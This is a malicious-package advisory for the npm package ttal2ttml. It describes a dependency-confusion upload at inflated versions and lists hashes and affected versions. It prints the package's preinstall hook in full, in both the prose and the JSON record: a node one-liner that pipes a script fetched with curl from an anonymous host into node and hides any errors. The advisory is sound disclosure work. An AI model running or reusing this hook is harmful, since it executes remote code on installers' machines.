MAL-2026-6298
Vulnerability from ossf_malicious_packages
Published
2026-06-23 14:11
Modified
2026-06-23 19:42
Summary
Malicious code in ttal2ttml (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4)

package.json declares a preinstall lifecycle script that runs node -e "try{require('child_process').execSync('curl -sf https://d1ugk469z93e.0ac.io/callback.js | node',{stdio:'ignore'})}catch(e){}". On every npm install, the package fetches an unpinned JavaScript payload from the anonymous subdomain d1ugk469z93e.0ac.io and pipes it into node, executing whatever bytes the host returns under the installer's user account. Errors are swallowed via try/catch and stdio:'ignore' to hide failures. The destination is not the publisher's domain and the package's nominal purpose (TTML conversion) requires no network access. The package is also published at an artificially elevated version (99.0.3) with an empty index.js that self-describes as a dependency-confusion research PoC — the canonical shape used to win resolution against a private internal package of the same name. Regardless of stated intent, the remote-exec payload runs on every installer.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits
Amazon Inspector inspector-research@amazon.com
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "package.json",
              "sha256": "fbdf50208af4a236fe28a20b876b062019e5caf4bd5817efea74053668d1df93",
              "tlsh": "a7f0a3771d2695372cd185e51835421a7472ce265449390ed7570138528dfb3027b1be"
            }
          ],
          "package_integrity": [
            {
              "filename": "ttal2ttml-99.0.1.tgz",
              "hashes": {
                "sha1": "43e93b6c33c5c23289c146b39624c6c0614515e1",
                "sha512_sri": "sha512-YC2szI8tgTh6OVIiGTl+CpSRizodQ3GJ7ZT1NrR4P4Fi4YwrWuPRWDhb1j1uczs3CVgvNl+jNGXiCp/mO5em5Q=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "ttal2ttml"
      },
      "versions": [
        "99.0.1",
        "99.0.3",
        "99.0.2",
        "1.0.4"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-007202",
        "import_time": "2026-06-23T14:23:02.957347197Z",
        "modified_time": "2026-06-23T14:11:40Z",
        "sha256": "281c5569265aa0093b3578ffebd476c0ad1e6bb42e90f5fc2fe1fcbf4643bfe1",
        "source": "amazon-inspector",
        "versions": [
          "99.0.1"
        ]
      },
      {
        "id": "IN-MAL-2026-007203",
        "import_time": "2026-06-23T14:23:03.063386834Z",
        "modified_time": "2026-06-23T14:11:40Z",
        "sha256": "29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4",
        "source": "amazon-inspector",
        "versions": [
          "99.0.3"
        ]
      },
      {
        "id": "IN-MAL-2026-007204",
        "import_time": "2026-06-23T14:23:03.182435725Z",
        "modified_time": "2026-06-23T14:11:44Z",
        "sha256": "2d1803d586219b8e414fc8e880ee05cf3d5b34427df51f8a42847b769dd3f2cf",
        "source": "amazon-inspector",
        "versions": [
          "99.0.2"
        ]
      },
      {
        "id": "IN-MAL-2026-007338",
        "import_time": "2026-06-23T19:40:41.324392806Z",
        "modified_time": "2026-06-23T19:30:00Z",
        "sha256": "af36f2b2617af9508212a148c62d8eee99fd0236d2bc4368bfa2d00ce1b52486",
        "source": "amazon-inspector",
        "versions": [
          "1.0.4"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4)\npackage.json declares a preinstall lifecycle script that runs `node -e \"try{require(\u0027child_process\u0027).execSync(\u0027curl -sf https://d1ugk469z93e.0ac.io/callback.js | node\u0027,{stdio:\u0027ignore\u0027})}catch(e){}\"`. On every `npm install`, the package fetches an unpinned JavaScript payload from the anonymous subdomain d1ugk469z93e.0ac.io and pipes it into `node`, executing whatever bytes the host returns under the installer\u0027s user account. Errors are swallowed via try/catch and stdio:\u0027ignore\u0027 to hide failures. The destination is not the publisher\u0027s domain and the package\u0027s nominal purpose (TTML conversion) requires no network access. The package is also published at an artificially elevated version (99.0.3) with an empty index.js that self-describes as a dependency-confusion research PoC \u2014 the canonical shape used to win resolution against a private internal package of the same name. Regardless of stated intent, the remote-exec payload runs on every installer.\n",
  "id": "MAL-2026-6298",
  "modified": "2026-06-23T19:42:42Z",
  "published": "2026-06-23T14:11:40Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/ttal2ttml/v/99.0.1"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/ttal2ttml/v/99.0.3"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/ttal2ttml/v/99.0.2"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/ttal2ttml/v/1.0.4"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in ttal2ttml (npm)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.